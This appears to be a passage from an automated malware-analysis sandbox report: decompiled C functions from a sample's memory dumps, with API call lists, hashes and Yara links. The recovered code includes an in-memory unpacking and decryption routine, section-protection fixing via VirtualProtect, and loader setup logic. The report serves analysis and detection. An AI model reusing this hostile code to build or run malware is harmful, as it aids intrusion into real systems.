Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 378212d9da8950cd2188f7e62f3e7f9a286443e85dc205e55debbf9f18d0dcf9
Instruction ID: 089d0c22bb3adc923c22f564fbb772f200132ce846a9caadef18d43185ec8bb9
Opcode Fuzzy Hash: 378212d9da8950cd2188f7e62f3e7f9a286443e85dc205e55debbf9f18d0dcf9
Instruction Fuzzy Hash: C22160B160070ADFD722EF69DD98E6AB7ECEF54304B0141D5F945CB251EB70EA068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4EE5, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00BA4EE5(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00BA54ED();
				if(_t21 != 0) {
					_t59 =  *0xbad25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xbad25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xbad164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00BA3496( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xbad2a4; // 0x44fa5a8
					if( *0xbad25c > 5) {
						_t8 = _t26 + 0xbae5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xbaea15; // 0x44283a44
						_t27 = _t7;
					}
					E00BA61FB(_t27, _t27);
					_t31 = E00BA65B1(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xbad270 =  *0xbad270 ^ 0x81bbe65d;
						_t32 = E00BA8D59(0x60);
						 *0xbad324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xbad324; // 0x50a95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xbad324; // 0x50a95b0
							 *_t51 = 0xbae836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xbad238, 0, 0x43);
							 *0xbad2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xbad25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xbad2a4; // 0x44fa5a8
								_t13 = _t58 + 0xbae55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xbac29f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00BA5DC6( ~_v8 &  *0xbad270, 0xbad00c); // executed
								_t54 = E00BA2E55(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00BA5672(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00BA27F7(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00BA4A32(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xbad160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00BA66F6(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00ba4ee5
0x00ba4ef0
0x00ba4ef3
0x00ba4ef6
0x00ba4ef9
0x00ba4f00
0x00ba4f02
0x00ba4f0e
0x00ba4f10
0x00ba4f10
0x00ba4f19
0x00ba4f1f
0x00ba4f24
0x00ba4f3e
0x00ba4f4a
0x00ba4f4c
0x00ba4f51
0x00ba4f5b
0x00ba4f5b
0x00ba4f53
0x00ba4f53
0x00ba4f53
0x00ba4f53
0x00ba4f62
0x00ba4f6f
0x00ba4f76
0x00ba4f7b
0x00ba4f7b
0x00ba4f83
0x00ba4f86
0x00ba4fac
0x00ba4fb8
0x00ba4fbd
0x00ba4fc2
0x00ba4fc4
0x00ba4ff0
0x00ba4ff2
0x00ba4fc6
0x00ba4fca
0x00ba4fcf
0x00ba4fd4
0x00ba4fdb
0x00ba4fe1
0x00ba4fe6
0x00ba4fec
0x00ba4ff3
0x00ba4ff5
0x00ba4ff7
0x00ba5006
0x00ba500c
0x00ba5011
0x00ba5013
0x00ba5043
0x00ba5045
0x00ba5015
0x00ba5015
0x00ba501b
0x00ba5028
0x00ba502e
0x00ba502e
0x00ba5036
0x00ba503f
0x00ba5046
0x00ba5048
0x00ba504a
0x00ba5051
0x00ba505e
0x00ba5068
0x00ba506a
0x00ba506c
0x00000000
0x00000000
0x00ba506e
0x00ba5073
0x00ba5075
0x00ba507c
0x00ba5080
0x00ba5083
0x00ba5098
0x00ba509c
0x00ba50a1
0x00000000
0x00ba50a1
0x00ba5085
0x00ba5087
0x00000000
0x00000000
0x00ba5092
0x00ba5094
0x00ba5096
0x00000000
0x00000000
0x00000000
0x00ba5096
0x00ba5079
0x00ba5079
0x00ba504a
0x00ba4f88
0x00ba4f88
0x00ba4f8d
0x00ba50a3
0x00ba50a7
0x00ba50af
0x00ba50af
0x00000000
0x00ba50a7
0x00ba4f93
0x00ba4f96
0x00ba4fa0
0x00ba4fa7
0x00000000
0x00ba50b7
0x00ba50b7
0x00ba50bb
0x00ba50bf
0x00ba50bf

APIs

Part of subcall function 00BA54ED: GetModuleHandleA.KERNEL32(4C44544E,00000000,00BA4EFE,00000000,00000000), ref: 00BA54FC

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00BA4F7B

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

memset.NTDLL ref: 00BA4FCA
RtlInitializeCriticalSection.NTDLL(050A9570), ref: 00BA4FDB

Part of subcall function 00BA4A32: memset.NTDLL ref: 00BA4A47
Part of subcall function 00BA4A32: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00BA4A7B
Part of subcall function 00BA4A32: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00BA4A86

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00BA5006
wsprintfA.USER32 ref: 00BA5036

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: e31f1b96e709f2752ca62ebf8fce3d4f90c0e6a05e321488f020588545502993
Instruction ID: d7764fac078c0d0d82032895c3b134fea3f7d3a1ae7e0c03d03af5345dc8c7be
Opcode Fuzzy Hash: e31f1b96e709f2752ca62ebf8fce3d4f90c0e6a05e321488f020588545502993
Instruction Fuzzy Hash: CD51F771A08614AFDB31EBA4EC86BAE77E8EB47700F1004A5F106E7151EBB5DE04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6466, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00BA64C3
SysAllocString.OLEAUT32(00BA6843), ref: 00BA6507
SysFreeString.OLEAUT32(00000000), ref: 00BA651B
SysFreeString.OLEAUT32(00000000), ref: 00BA6529

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 57cc8ae6656f174028a54c87bfae72b5b2aae50f690ef56cf48f1432c7e4b221
Instruction ID: d538aa8924a2d4f3949692b2c14982dc4aba448418551597c64ca60a5120fcba
Opcode Fuzzy Hash: 57cc8ae6656f174028a54c87bfae72b5b2aae50f690ef56cf48f1432c7e4b221
Instruction Fuzzy Hash: 95310EB5904209EFCB05DF98D8D49AE7BF9EF19300B14846EF506AB250DB30DA45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0038167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0038167E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x384130;
				_t39 = E00381F20(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x384140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x3851a2; // 0x3851a2
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E00381531(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x384140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x00381685
0x00381695
0x0038169a
0x0038169f
0x003816b4
0x003816bb
0x003816c0
0x003816d1
0x003816d4
0x003816da
0x003816df
0x00381789
0x003816e5
0x003816e5
0x003816e9
0x00381751
0x003816eb
0x003816eb
0x003816ee
0x003816f0
0x003816f8
0x003816fb
0x003816fe
0x00381706
0x0038170e
0x0038170f
0x00381710
0x00381717
0x00381717
0x0038172b
0x00381730
0x00381739
0x00381740
0x00381743
0x00381745
0x0038174c
0x00000000
0x00000000
0x00381703
0x00381703
0x0038174e
0x0038175b
0x00381770
0x0038175d
0x00381766
0x0038176b
0x00381781
0x00381781
0x00381790
0x00381796

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00381A05,?,00000000,?,?,?,?,?,?,?,00381A05), ref: 003816D4
memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,00381A05,00000000), ref: 00381766
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,00381A05), ref: 00381781

Strings

Dec 20 2020, xrefs: 00381706

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 20 2020
API String ID: 4010158826-3924289079
Opcode ID: 9a9b8bd0f9c83e2ee44a60aeb2a5ef3269525662a0907d4ea32353aa8ec668f0
Instruction ID: 294113750bf5c97d3709b451cbfca28e621cd6a199be2920531a7cc1168926e0
Opcode Fuzzy Hash: 9a9b8bd0f9c83e2ee44a60aeb2a5ef3269525662a0907d4ea32353aa8ec668f0
Instruction Fuzzy Hash: CE316575D0031A9BCF02DF99D881AEEB7BDFF48704F1081A9F905A7245D7719A468B90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA3231, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00BA3231(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00BA8D59(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00ba323d
0x00ba3241
0x00ba3242
0x00ba3243
0x00ba3245
0x00ba3247
0x00ba324a
0x00ba324f
0x00ba32e6
0x00ba32ed
0x00ba32ed
0x00ba3258
0x00ba325f
0x00ba326f
0x00ba326f
0x00ba3275
0x00ba3277
0x00ba327c
0x00ba3285
0x00ba328b
0x00ba3290
0x00ba329b
0x00ba329f
0x00ba32a1
0x00ba32a2
0x00ba32ab
0x00ba32af
0x00ba32c0
0x00ba32b1
0x00ba32b6
0x00ba32bb
0x00ba32ca
0x00ba32ca
0x00ba329f
0x00ba32d0
0x00ba32d6
0x00ba32d6
0x00ba32df
0x00ba32e4
0x00ba32e4
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00BA325F
lstrlenW.KERNEL32(?), ref: 00BA3295
memcpy.NTDLL(00000000,?,?,?), ref: 00BA32B6
SysFreeString.OLEAUT32(?), ref: 00BA32CA

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 340e0a70a5f4052447d88ad64a1b289dc1595c25e6013798b8a4e9f3bcfc9b05
Instruction ID: b13b09f45943bf6f8a342e23aeca349d173c0f398abab497c0466a01755ed99a
Opcode Fuzzy Hash: 340e0a70a5f4052447d88ad64a1b289dc1595c25e6013798b8a4e9f3bcfc9b05
Instruction Fuzzy Hash: 56213E75904209EFCB11DFA8D884A9EBBF4FF4A354B1081A9F905E7210EB30DB44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5C8C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA5C8C() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E00BA576C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xbad2a4; // 0x44fa5a8
				_t4 = _t24 + 0xbaedd0; // 0x50a9378
				_t5 = _t24 + 0xbaed78; // 0x4f0053
				_t26 = E00BA2AFE( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xbad2a4; // 0x44fa5a8
						_t11 = _t32 + 0xbaedc4; // 0x50a936c
						_t48 = _t11;
						_t12 = _t32 + 0xbaed78; // 0x4f0053
						_t51 = E00BA1FE0(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0xbad2a4; // 0x44fa5a8
							_t13 = _t35 + 0xbaee0e; // 0x30314549
							if(E00BA6C44(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0xbad25c - 6;
								if( *0xbad25c <= 6) {
									_t42 =  *0xbad2a4; // 0x44fa5a8
									_t15 = _t42 + 0xbaec2a; // 0x52384549
									E00BA6C44(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0xbad2a4; // 0x44fa5a8
							_t17 = _t38 + 0xbaee08; // 0x50a93b0
							_t18 = _t38 + 0xbaede0; // 0x680043
							_t40 = E00BA5931(_v8, 0x80000001, _t51, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xbad238, 0, _t51);
						}
					}
					HeapFree( *0xbad238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00BA3822(_t53);
				}
				return _t45;
			}

0x00ba5c9c
0x00ba5c9f
0x00ba5ca6
0x00ba5ca8
0x00ba5ca8
0x00ba5cab
0x00ba5cb0
0x00ba5cb7
0x00ba5cc4
0x00ba5cc9
0x00ba5ccd
0x00ba5cdb
0x00ba5ce9
0x00ba5ced
0x00ba5d7e
0x00ba5d7e
0x00ba5cf3
0x00ba5cf3
0x00ba5cf8
0x00ba5cf8
0x00ba5cff
0x00ba5d0b
0x00ba5d0d
0x00ba5d0f
0x00ba5d11
0x00ba5d18
0x00ba5d2a
0x00ba5d2c
0x00ba5d33
0x00ba5d35
0x00ba5d3c
0x00ba5d47
0x00ba5d47
0x00ba5d33
0x00ba5d4c
0x00ba5d51
0x00ba5d58
0x00ba5d68
0x00ba5d76
0x00ba5d78
0x00ba5d78
0x00ba5d0f
0x00ba5d8a
0x00ba5d8a
0x00ba5d8c
0x00ba5d91
0x00ba5d93
0x00ba5d93
0x00ba5d9e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050A9378,00000000,?,73BCF710,00000000,73BCF730), ref: 00BA5CDB
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050A93B0,?,00000000,30314549,00000014,004F0053,050A936C), ref: 00BA5D78
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BA2885), ref: 00BA5D8A

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b7049a4bc135a065c6cadbae4af2475f8b7bc504008c860cda495a9f4211c84
Instruction ID: b09af0ca80d744169427be05df289825d4d41bdfa806d1e41dd2317367353e14
Opcode Fuzzy Hash: 3b7049a4bc135a065c6cadbae4af2475f8b7bc504008c860cda495a9f4211c84
Instruction Fuzzy Hash: F5319E32500608BFDB20EBA4DC89EAE7BFDEB46710F1500E5B515AB071D770EA04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9425, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00BA9425(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0xbad2a4; // 0x44fa5a8
				_push(0x800);
				_push(0);
				_push( *0xbad238);
				_t1 = _t43 + 0xbae791; // 0x6976612e
				_t44 = _t1;
				if( *0xbad24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0xbad24c =  *0xbad24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00BA4D95(_a4, _t41); // executed
						_t19 = E00BA315A(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0xbad24c < 5) {
								 *0xbad24c =  *0xbad24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E00BA5BEA();
						RtlFreeHeap( *0xbad238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E00BA1D4C(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E00BA12C4(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}

0x00ba9425
0x00ba9425
0x00ba9428
0x00ba9429
0x00ba9433
0x00ba943a
0x00ba943f
0x00ba9441
0x00ba9447
0x00ba9447
0x00ba944d
0x00ba9475
0x00ba948d
0x00ba948f
0x00ba9490
0x00ba9492
0x00ba94d0
0x00ba94d0
0x00ba94d6
0x00ba94dc
0x00ba94dc
0x00ba9494
0x00ba949a
0x00ba949d
0x00ba94ac
0x00ba94ae
0x00ba94b5
0x00ba94e9
0x00ba94ee
0x00ba94f0
0x00ba94f2
0x00ba94f2
0x00000000
0x00ba94f0
0x00ba94b7
0x00ba94bc
0x00ba94ca
0x00000000
0x00ba94ca
0x00ba9484
0x00ba9489
0x00ba9489
0x00000000
0x00ba9489
0x00ba944f
0x00ba9457
0x00000000
0x00000000
0x00ba9466
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 00BA944F

Part of subcall function 00BA12C4: GetTickCount.KERNEL32 ref: 00BA12D8
Part of subcall function 00BA12C4: wsprintfA.USER32 ref: 00BA1328
Part of subcall function 00BA12C4: wsprintfA.USER32 ref: 00BA1345
Part of subcall function 00BA12C4: wsprintfA.USER32 ref: 00BA1371
Part of subcall function 00BA12C4: HeapFree.KERNEL32(00000000,?), ref: 00BA1383
Part of subcall function 00BA12C4: wsprintfA.USER32 ref: 00BA13A4
Part of subcall function 00BA12C4: HeapFree.KERNEL32(00000000,?), ref: 00BA13B4
Part of subcall function 00BA12C4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BA13E2
Part of subcall function 00BA12C4: GetTickCount.KERNEL32 ref: 00BA13F3

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 00BA946D
RtlFreeHeap.NTDLL(00000000,00000002,00BA28D0,?,00BA28D0,00000002,?,?,00BA50A1,?), ref: 00BA94CA

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: e9506b854ac1c7e0d00c9644336eac8399d1feaa7b4db9b81ff3a431d426f010
Instruction ID: 601afc4083ff5cc941b126afa4a9eff4a3d58e7986ed8bfd5d70db00d85df1ba
Opcode Fuzzy Hash: e9506b854ac1c7e0d00c9644336eac8399d1feaa7b4db9b81ff3a431d426f010
Instruction Fuzzy Hash: 52217F76204204EBDB219F59DC41F9A7BECEB8A744F1040A6F902DB250DF70E902DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003815BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E003815BC(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x003815c6
0x003815cb
0x003815d7
0x003815e4
0x003815ea
0x003815ec
0x003815f2
0x0038165f
0x00381666
0x00381666
0x003815f4
0x003815f7
0x003815f7
0x003815fb
0x00000000
0x00000000
0x003815fd
0x00381601
0x00381619
0x0038161d
0x00381631
0x0038161f
0x0038161f
0x00381625
0x00381629
0x00381629
0x00381603
0x00381603
0x0038160f
0x00381614
0x00381614
0x00381642
0x00381646
0x0038164e
0x0038164e
0x00381651
0x00381654
0x00381657
0x0038165d
0x00000000
0x00000000
0x00000000
0x00000000
0x0038165d
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 003815EA
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00381642
GetLastError.KERNEL32 ref: 00381648

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: f247848cc4e1d15f55bdf75931d12df9fca3e1414063ac639d6649de335655ac
Instruction ID: 522bafcfba0d13443d7593aad3e01f611ac78fc92aae23036a29ec670f2965d5
Opcode Fuzzy Hash: f247848cc4e1d15f55bdf75931d12df9fca3e1414063ac639d6649de335655ac
Instruction Fuzzy Hash: 4121C3B2800309EFDB209F94CC81FBDB7B8FB10714F154489E98197142E3749A85CB54

Uniqueness

